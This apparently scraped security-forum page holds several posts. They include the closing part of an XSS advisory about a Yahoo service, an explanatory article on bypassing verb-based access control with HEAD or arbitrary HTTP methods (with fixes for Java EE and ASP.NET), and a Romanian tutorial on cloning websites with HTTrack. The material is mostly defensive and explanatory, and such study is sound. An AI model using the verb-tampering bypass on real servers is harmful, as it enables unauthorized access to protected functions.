patched by a secure parse and encode of the vulnerable id value in the emarketing service application of yahoo. Restrict the input and disallow special chars or script code tags to prevent further injection attacks. Security Risk: ============== The security risk of the client-side cross site scripting web vulnerability in the tw yahoo application is estimated as medium. (CVSS 3.3) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Hadji Samir [s-dz@hotmail.fr] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
  22. What is an HTTP VERB? Hypertext transfer protocol (HTTP) gives you list of methods that can be used to perform actions on the web server. Many of these methods are designed to help developers in deploying and testing HTTP applications in development or debugging phase. These HTTP methods can be used for nefarious purposes if the web server is misconfigured. Also, some high vulnerability like Cross Site Tracing (XST), a form of cross site scripting using the server’s HTTP TRACE method, is examined. In HTTP methods, GET and POST are most commonly used by developers to access information provided by a web server. HTTP allows several other method as well, which are less known methods. Following are some of the methods: HEAD GET POST PUT DELETE TRACE OPTIONS CONNECT Many of these methods can potentially pose a critical security risk for a web application, as they allow an attacker to modify the files stored on the web server, delete the web page on the server, and upload a web shell to the server which leads to stealing the credentials of legitimate users. Moreover, when rooting the server, the methods that must be disabled are the following: PUT: This method allows a client to upload new files on the web server. An attacker can exploit it by uploading malicious files (e.g. an ASP or PHP file that executes commands by invoking cmd.exe), or by simply using the victim’s server as a file repository. DELETE: This method allows a client to delete a file on the web server. An attacker can exploit it as a very simple and direct way to deface a web site or to mount a Denial of Service (DOS) attack. CONNECT: This method could allow a client to use the web server as a proxy TRACE: This method simply echoes back to the client whatever string has been sent to the server, and is used mainly for debugging purposes of developers. This method, originally assumed harmless, can be used to mount an attack known as Cross Site Tracing, which has been discovered by Jeremiah Grossman. If an application requires any one of the above mentioned, such as in most cases REST Web Services may require the PUT or DELETE method, it is really important to check that their configuration/usage is properly limited to trusted users and safe environment. Many web environments allow verb based authentication and access control (VBAAC). This is basically nothing but a security control using HTTP methods such as GET and POST (usually used). Let’s take an example to make you understand better. JAVA EE web XML file <security-constraint> <web-resource-<a href="http://resources.infosecinstitute.com/collection/">collection</a>> <url-pattern>/auth/*</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> </web-resource-collection> <auth-constraint> <role-name>root</role-name> </auth-constraint> </security-constraint> In the above example, the rule is limited to the /auth directory to root role only. However, this limitation can be bypasses using HTTP verb tempering even after limited/restricted access to the mentioned role. As we can see, the above mentioned configuration has only restricted the same using GET and POST methods only. We can easily bypass this with the use of the HEAD method; you can also try any other HTTP methods as well such as PUT, TRACK, TRACE, DELETE, etc. Also, you can try to bypass the same by sending arbitrary strings such as ASDF as an HTTP verb (method). Following are some conditions where bypassing is possible: It has GET functionality that is not idempotent or execute an arbitrary HTTP Method It uses a security control that lists HTTP verbs The security control fails to block HTTP methods that are not listedThese are the most common scenarios where you can bypass the same. It also depend upon rule misconfiguration. How we can bypass VBAAC with HTTP methods Using HEAD method As mentioned above, the HEAD Method is used to fetch a result similar to GET but with no response body. Imagine a URL in your application that is protected by security constraints that restrict access to the /Auth directory with GET and POST only. http://httpsecure.org/auth/root.jsp?cmd=adduser If you try to force browse to the URL in a browser, a security constraint will check the rule to see whether the requested resource and requestor are authorized or not. The first rule will check the HTTP method as it came from the browser, so it should be a GET or POST method that’s stopped by the security constraint. If you use a browser proxy such as BurpSuite to intercept the request and craft it by changing GET to HEAD method, since HEAD method is not listed in the security constraint the request willnot be blocked. So the adduser function will be successfully invoked and you will get the empty response back in the browser due to HEAD functionality. Using Arbitrary HTTP Verbs Most of the platforms allow the use of arbitrary HTTP verbs such as PHP, JAVA EE. These methods execute similar to a GET request, which enables you to bypass the same. Most importantly, using the arbitrary methods response will not be stripped as it is for the HEAD method. You can see the internal pages easily. With the using arbitrary method, instead of the HEAD method page source code can be viewed. Some Vendors Allow HEAD Verbs Many server vendors allow HEAD verbs by default, such as: APACHE 2.2.8 JBOSS 4.2.2 WEBSPERE 6.1 TOMCAT 6.0 IIS 6.0 WEBLOGIC 8.2 Allowing the HEAD method is not a vulnerability at all, as it is a requirement in the RFC. Let’s have a look at some of the most popular outdated application security mechanisms to see if we can use them to bypass VBAAC.Following are the servers which may get affected by VERB tampering techniques. JAVA EE Allow HTTP Verbs in Policy -YES Bypassing Possible – YES HEAD can be in policy – YES .htaccess Allow HTTP Verbs in Policy – YES Bypassing Possible – YES (if not set) HEAD can be in policy – YES ASP.NET Allow HTTP Verbs in Policy – YES Bypassing Possible – YES (if not set) HEAD can be in policy – YES Java EE Containers Let’s consider the following security constraint policy: <security-constraint> <display-name>Example Security Constraint Policy</display-name> <web-resource-collection> <web-resource-name>Protected Area</web-resource-name> <!-- Define the context-relative URL(s) to be protected --> <url-pattern>/auth/security/*</url-pattern> <!-- If you list http methods, only those methods are protected --> <http-method>POST</http-method> <http-method>PUT</http-method> <http-method>DELETE</http-method> <http-method>GET</http-method> </web-resource-collection> ... </security-constraint> In the above mentioned code, listed methods are protected, so this rule will only trigger if a request for anything in the /auth/security directory uses a verb in the <http-method> list. The best way to implement this policy would be to block any method that is not listed, butthat is not the way these mechanisms currently behave, and you can see that the HEAD verb is not in this list. So, forwarding the HTTP HEAD request will bypass this policy entirely, and after that, the application server will pass the request to the GET handler. The right approach to secure a JAVA EE is to remove all the <http-method> elements from this policy, which simply applies this rule to all the HTTP methods, but if you still want to restrict access to specific method, then you need to setup two policies as mentioned below. <security-constraint> <web-resource-collection> <web-resource-name>site</web-resource-name> <url-pattern>/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> ... </security-constraint> <security-constraint> <web-resource-collection> <web-resource-name>site</web-resource-name> <url-pattern>/*</url-pattern> </web-resource-collection> ... </security-constraint> So, the first policy denies a GET request to access and second policy denies all. ASP.NET Authorization Let’s have a look at the ASP.NET authorization security mechanism configuration, which is vulnerable to bypass with VBAAC. <authorization> <allow verbs="POST" users="joe"/> <allow verbs="GET" users="*"/> <deny verbs="POST" users="*"/> </authorization> In the above mentioned rule, the user JOE can only submit a POST request. In this example, this cannot be bypassed, the reason being GET methods are allowed to everyone. So, there are no securities to bypass using the HEAD method. <authorization> <allow verbs="GET" users="root"/> <allow verbs="POST" users="joe"/> <deny verbs="POST,GET" users="*" /> </authorization> This one is vulnerable to bypass using HEAD method. This is possible because .Net implicitly inserts an “allow all” rule in to each authorization. After listing their role entitlements appropriately, append a “deny all” rule. <authorization> <allow verbs="GET" users="root"/> <allow verbs="POST" users="joe"/> <deny verbs="*" users="*" /> </authorization> This will ensure that the only requests that pass the authorization check are those that have a specific HTTP verb that is in the authorization rule. Some Points to remember 1) Always enable deny all option 2) Configure your web and application server to disallow HEAD requests entirely Thanks for reading References https://www.owasp.org/index.php/Test_HTTP_Methods_%28OTG-CONFIG-006%29 http://www.aspectsecurity.com/research-presentations/bypassing-vbaac-with-http-verb- tampering Source
  23. Salutare,dupa ceva timp am decis sa fac un tutorial despre cum putem sa copiem un website pana in cele mai mici detalii. Pasul 1: Vom incepe prin descarcarea programului necesar clonarii oricarui site web. HTTrack este un program dezvoltat de o echipa de francezi si din fericire pentru noi este distribuit gratuit. Intram pe HTTrack.com si accesam sectiunea Downloads de unde descarcam cea mai noua versiune. Pasul 2: Vom cauta site-ul pe care dorim sa il clonam. Deoarece in urma cu cateva zile am spus intr-un video de pe YouTube ca voi clona un site web apartinand cavaleria.ro ( este doar un exemplu pur demonstrativ) il voi clona pe acela, asa ca adresa mea tinta va fi Cavaleria.RO Pasul 3: Dupa ce am descarcat programul mentionat la pasul anterior, il instalam dupa metoda clasica "Next > I accept > Next > ... > Finish" Pasul 4: Deschidem programul si observam ca suntem intampinati de o fereastra de inceput. Apasam Next. Pasul 5: Vedem ca apar 3 casute: Project name, Project category, Base path Project name - il completam cu un nume oarecare, eu am completat cu "clonarecavaleria" Project category - il completam cu un nume oarecare, eu am completat cu "p_clonarecavaleria" Base path - locul unde dorim sa se salveze clona website-ului Pasul 6: Completam campul Web Adresses cu pagina web ce dorim sa o clonam. Pasul 7: Apasam pe Next dupa care pe Finish si asteptam ca programul sa isi faca treaba (in functie de complexitatea site-ului, clonarea s-ar putea sa dureze.. bine-nteles, depinde si de viteza conexiunii dvs. la internet) Pasul 8: Dupa ce site-ul a fost downloadat (eu cand am ales bluepanel-ul, am oprit operatia de clonare dupa 2-3 minute deoarece downloada fiecare profil al fiecarui jucator, si ar fii durat cateva ore bune) Pasul 9: Intram in C:\My Web Sites sau locatia precizata de dvs la pasul 5 si deschidem folderul denumit precum Project name-ul vostru. Pasul 10: Intram in folderul cavaleria.ro (folderul denumit precum URL-ul site-ului clonat) si putem deschide si observa ca fisierul index.html (precum toate celalalte fisiere) este identic cu cel al site-ului original. Observatii si precizari: Acesta a fost un tutorial pur demonstrativ Acest program este incapabil sa copieze si codul PHP al siteului (adica efectiv partea de script - functionalitatea site-ului) Acest program este foarte util daca doriti sa copiati aspectul unui site, copiaza pana in cele mai mici detalii. Tutorialul este creat de mine,a mai fost postat pe blogul meu! Daca nu intelegi ceva, lasati in comentariu si o sa va raspund. Multumesc pentru timpul acordat!
  24. Salut am 17 ani. Imi place programarea si web design-ul. Cunostinte: Delphi, Php, MySql, Linux
×
×
  • Create New...